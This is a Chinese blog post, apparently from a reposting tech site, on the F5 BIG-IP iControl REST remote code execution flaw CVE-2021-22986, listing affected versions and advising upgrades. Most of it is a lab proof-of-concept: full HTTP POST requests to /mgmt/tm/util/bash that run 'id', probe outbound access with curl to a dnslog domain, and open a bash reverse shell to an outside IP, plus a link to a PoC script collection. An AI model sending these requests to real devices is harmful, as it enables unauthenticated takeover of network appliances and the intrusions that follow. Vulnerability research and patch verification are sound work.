F5 BIG-IP远程代码执行漏洞CVE-2021-22986的分析是怎样的


F5 BIG-IP远程代码执行漏洞CVE-2021-22986的分析是怎样的,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2021 年3月10日,F5官方发布安全通告,安全更新包含了影响F5的BIG-IP,BIG-IQ设备的多个高危漏洞,漏洞编号分别为CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986为F5 BIG-IP/IQ设备 iControl REST接口的未授权远程代码执行漏洞,漏洞评分9.8,评级严重。F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0部署安装F5 BIG-IPV漏洞测试靶场环境。1、访问漏洞环境2、POC验证,进行命令执行操作1.系统命令执行POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 41Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests: 1Content-Type: application/json{“command”:”run”,”utilCmdArgs”:”-c id”}2.通过dnslog探测是否可以出网生成域名:zg8ie5.dnslog.cn出网探测POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 62Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json{“command”:”run”,”utilCmdArgs”:”-c ‘curl zg8ie5.dnslog.cn'”}发现可以出网3.通过bash反弹shell到vpsPOST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 83Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests: 1Content-Type: application/json{“command”:”run”,”utilCmdArgs”:”-c ‘bash -i >&/dev/tcp/6.6.6.6/12377 0>&1′”}漏洞验证python脚本https://github.com/PeiQi0/PeiQi-WIKI-POC升级到最新版本关于F5 BIG-IP远程代码执行漏洞CVE-2021-22986的分析是怎样的问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你免费云主机域名还有很多疑惑没有解开,可以关注云编程开发博客行业资讯频道了解更多相关知识。

相关推荐: Skywalking SQL注入漏洞CVE-2020-9483的开源APISIX应对方案是怎样的

今天就跟大家聊聊有关Skywalking SQL注入漏洞CVE-2020-9483的开源APISIX应对方案是怎样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。 Apache Skywalking最近…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/05 16:07
下一篇 02/05 16:07